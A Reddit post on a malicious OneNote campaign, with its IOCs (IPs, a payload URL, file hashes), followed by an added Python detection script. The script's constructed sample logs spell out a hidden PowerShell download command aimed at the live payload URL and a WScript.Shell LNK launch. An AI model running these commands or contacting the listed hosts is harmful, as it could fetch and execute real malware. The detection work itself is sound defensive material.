Be aware of the new malicious OneNote campaign!
Nov. 3, 2023, 9:49 a.m. | /u/arieldavidpur
cybersecurity www.reddit.com
1. PowerShell script - Creates a WebClient to access the C2 with the Empire User-Agent, then gets the malicious payload, encrypted with RC4.
2. Batch file - Creates an LNK file and runs it with a WScript.Shell command, then drops a remote EXE file and executes it using conhost.exe
IOCs:
34[.]159[.]33[.]139 (Google Cloud)
167[.]235[.]247[.]158
hxxps://botfusion1-8f4913f37609[.]herokuapp[.]com/331736/voicemail4.ex_
b297041a66ff6e4cd884a33e7600478f529bc88f6105e5a81bd9f177eaf18a5e
2944991319bdce514a8313db92f195200fc9568afba4059f5cc315aa0e9a6713
15f5ce97c44e17d9c094d0de6c8cab95331f485f352bc298f1561761ff1705c6
7670970292647266783fd0006663746e1d448043fc1c4aba0927c3afd9d331b0
4f9b3d45cf05f70371b9a27ae0af7fc1f75b8aad4dc9fa87f44988716e355c33
2be7bee6f5c5c8b6b54cedeef908154316a6f924a7c90f8b9c07cd26d68fbcca
#onenote #malwareanalysis #malware #cybersecurity #emailsecurity #browsersecurity #websecurity #googlecloudplatform Microsoft #sliver …
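As an added example (editor's code, not part of the Reddit post and not the poster's own tooling): a small Python triage script that refangs the IOCs listed above and runs them, together with behavioural rules for the two-stage chain the post describes (OneNote spawning a script host, PowerShell WebClient download, WScript.Shell launching an LNK, conhost.exe running an EXE from a user-writable path), over a few constructed log lines. The Empire User-Agent string, the Sysmon-style field names (ParentImage=, Image=, CommandLine=), the proxy/EDR line formats and every path and hostname other than the IOCs themselves are assumptions made for the example.

```python
import re

# IOCs copied from the post above, in the defanged form it uses.
DEFANGED_NETWORK_IOCS = [
    "34[.]159[.]33[.]139",
    "167[.]235[.]247[.]158",
    "hxxps://botfusion1-8f4913f37609[.]herokuapp[.]com/331736/voicemail4.ex_",
]
FILE_HASHES = {
    "b297041a66ff6e4cd884a33e7600478f529bc88f6105e5a81bd9f177eaf18a5e",
    "2944991319bdce514a8313db92f195200fc9568afba4059f5cc315aa0e9a6713",
    "15f5ce97c44e17d9c094d0de6c8cab95331f485f352bc298f1561761ff1705c6",
    "7670970292647266783fd0006663746e1d448043fc1c4aba0927c3afd9d331b0",
    "4f9b3d45cf05f70371b9a27ae0af7fc1f75b8aad4dc9fa87f44988716e355c33",
    "2be7bee6f5c5c8b6b54cedeef908154316a6f924a7c90f8b9c07cd26d68fbcca",
}

# Assumption, not stated in the post: Empire's default HTTP User-Agent string.
EMPIRE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into the literal string seen in logs."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


# Anchor each network IOC so 34.159.33.139 does not match inside 134.159.33.139.
NETWORK_IOC_PATTERNS = [
    (refang(i), re.compile(r"(?<![\w.])" + re.escape(refang(i)) + r"(?!\w)", re.I))
    for i in DEFANGED_NETWORK_IOCS
]

# Behavioural rules for the chain described in the post. The field names
# (ParentImage=, Image=, CommandLine=) are an assumed Sysmon-style layout.
BEHAVIOUR_RULES = [
    ("onenote_spawns_script_host",
     r"ParentImage=.*\\onenote\.exe\b.*\bImage=.*\\(cmd|powershell|wscript|cscript)\.exe\b"),
    ("powershell_webclient_download",
     r"powershell.*(Net\.WebClient|DownloadString|DownloadData|DownloadFile)"),
    ("wscript_shell_lnk", r"WScript\.Shell.*\.lnk\b"),
    ("conhost_launches_user_writable_exe",
     r"Image=.*\\conhost\.exe\b.*CommandLine=.*\\(Temp|AppData|Users\\Public)\\.*\.exe"),
]
HASH_RE = re.compile(r"\b[0-9a-f]{64}\b")


def scan_line(line: str) -> list[str]:
    """Return every indicator and behaviour that fires on one log line."""
    hits = []
    for literal, pattern in NETWORK_IOC_PATTERNS:
        if pattern.search(line):
            hits.append(f"ioc:{literal}")
    # Hashes are compared case-insensitively; the post mixes upper and lower case.
    for digest in HASH_RE.findall(line.lower()):
        if digest in FILE_HASHES:
            hits.append(f"hash:{digest}")
    if EMPIRE_UA.lower() in line.lower():
        hits.append("ua:empire_default")
    for name, pattern in BEHAVIOUR_RULES:
        if re.search(pattern, line, re.IGNORECASE):
            hits.append(f"behaviour:{name}")
    return hits


def scan_log(text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers to their hits, keeping only lines that matched."""
    results = {}
    for number, line in enumerate(text.splitlines(), start=1):
        hits = scan_line(line)
        if hits:
            results[number] = hits
    return results


# Constructed sample telemetry (not real logs); everything except the IOCs
# taken from the post is made up for the example. The last line is benign.
SAMPLE_LOG = r"""proxy src=10.1.2.33 dst=34.159.33.139 method=GET ua="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" status=200
sysmon EventID=1 ParentImage=C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -w hidden -c $c=New-Object Net.WebClient;$c.DownloadData('https://botfusion1-8f4913f37609.herokuapp.com/331736/voicemail4.ex_')
sysmon EventID=1 ParentImage=C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c echo CreateObject("WScript.Shell").Run "C:\Users\bob\AppData\Local\Temp\open.lnk"
sysmon EventID=1 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\conhost.exe CommandLine=conhost.exe C:\Users\bob\AppData\Local\Temp\voicemail4.exe
edr FileCreate path=C:\Users\bob\AppData\Local\Temp\voicemail4.exe sha256=15F5CE97C44E17D9C094D0DE6C8CAB95331F485F352BC298F1561761FF1705C6
sysmon EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -c Get-Date
"""

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(hits)}")
```

The atomic IOCs (IPs, URL, hashes) will age quickly once the infrastructure is rotated; the behavioural rules are the part worth carrying into a real SIEM query, and the OneNote-to-script-host parent/child pair is the cheapest of them to alert on with a low false-positive rate.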